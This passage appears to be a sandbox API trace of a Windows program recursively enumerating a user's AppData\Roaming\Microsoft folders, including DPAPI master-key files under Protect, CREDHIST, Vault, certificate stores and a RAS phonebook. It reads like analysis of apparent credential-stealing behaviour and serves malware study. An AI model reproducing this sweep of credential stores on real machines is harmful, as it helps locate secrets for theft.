pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0057.222] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0057.222] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.223] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.223] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.223] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.223] PathMatchSpecW (pszFile="File Explorer.lnk", pszSpec="*") returned 1 [0057.223] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.223] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.223] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.223] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.223] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.224] PathMatchSpecW (pszFile="Window Switcher.lnk", pszSpec="*") returned 1 [0057.224] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.224] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.224] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.224] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="UserData" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0057.225] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0057.225] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb072d8 [0057.225] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.225] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.225] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="Low" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0057.225] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0057.226] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07558 [0057.226] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.226] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.226] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.226] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.226] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.227] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.227] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.227] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.227] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="MMC" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC" [0057.227] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*" [0057.227] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07458 [0057.280] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.281] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.281] FindClose (in: hFindFile=0xb07458 | out: hFindFile=0xb07458) returned 1 [0057.281] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.281] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Network" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network" [0057.281] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*" [0057.281] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0057.282] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.282] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.282] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network", pszFile="Connections" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0057.282] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0057.282] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.282] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.283] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.283] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="Pbk" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0057.283] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0057.283] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07418 [0057.283] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.283] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.283] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="_hiddenPbk" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0057.283] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0057.284] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0057.284] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.284] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.284] PathMatchSpecW (pszFile="rasphone.pbk", pszSpec="*") returned 1 [0057.284] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.284] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.285] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.285] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0057.285] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.285] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.286] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.286] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.286] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.286] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Protect" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect" [0057.287] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*" [0057.287] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07418 [0057.287] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.287] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.287] PathMatchSpecW (pszFile="CREDHIST", pszSpec="*") returned 1 [0057.287] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.287] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-3582695476-958571460-1978946630-1000" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000" [0057.288] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*" [0057.288] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07158 [0057.288] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.288] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.288] PathMatchSpecW (pszFile="0e76ac85-01bf-412c-91a2-cef2eedde61a", pszSpec="*") returned 1 [0057.288] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.288] PathMatchSpecW (pszFile="1c8a6982-c4e6-4629-889a-0618a9675336", pszSpec="*") returned 1 [0057.288] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.289] PathMatchSpecW (pszFile="1cb7f609-08bd-4986-8a90-4f6e24f5d8cc", pszSpec="*") returned 1 [0057.289] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.289] PathMatchSpecW (pszFile="491bb34f-16c1-4bee-9f8c-432483187207", pszSpec="*") returned 1 [0057.289] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.289] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0057.289] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.289] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.289] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.290] PathMatchSpecW (pszFile="SYNCHIST", pszSpec="*") returned 1 [0057.290] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.290] FindClose (in: hFindFile=0xb07418 | out: hFindFile=0xb07418) returned 1 [0057.300] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.300] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="SystemCertificates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0057.300] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0057.300] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb071d8 [0057.301] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.301] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.301] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="My" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0057.301] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0057.301] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07158 [0057.301] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.301] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.301] PathMatchSpecW (pszFile="AppContainerUserCertRead", pszSpec="*") returned 1 [0057.301] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.302] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="Certificates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0057.302] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0057.302] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07458 [0057.302] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.302] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.302] FindClose (in: hFindFile=0xb07458 | out: hFindFile=0xb07458) returned 1 [0057.303] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.303] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CRLs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0057.303] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0057.303] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb072d8 [0057.303] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.303] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.303] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.304] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.304] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CTLs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0057.304] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0057.304] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07218 [0057.304] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.304] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.304] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.304] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.305] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.305] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.305] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.305] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.305] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Vault" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault" [0057.305] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*" [0057.305] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Vault\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb072d8 [0057.306] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.306] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.306] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.306] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.307] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Windows" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows" [0057.307] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Windows", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI 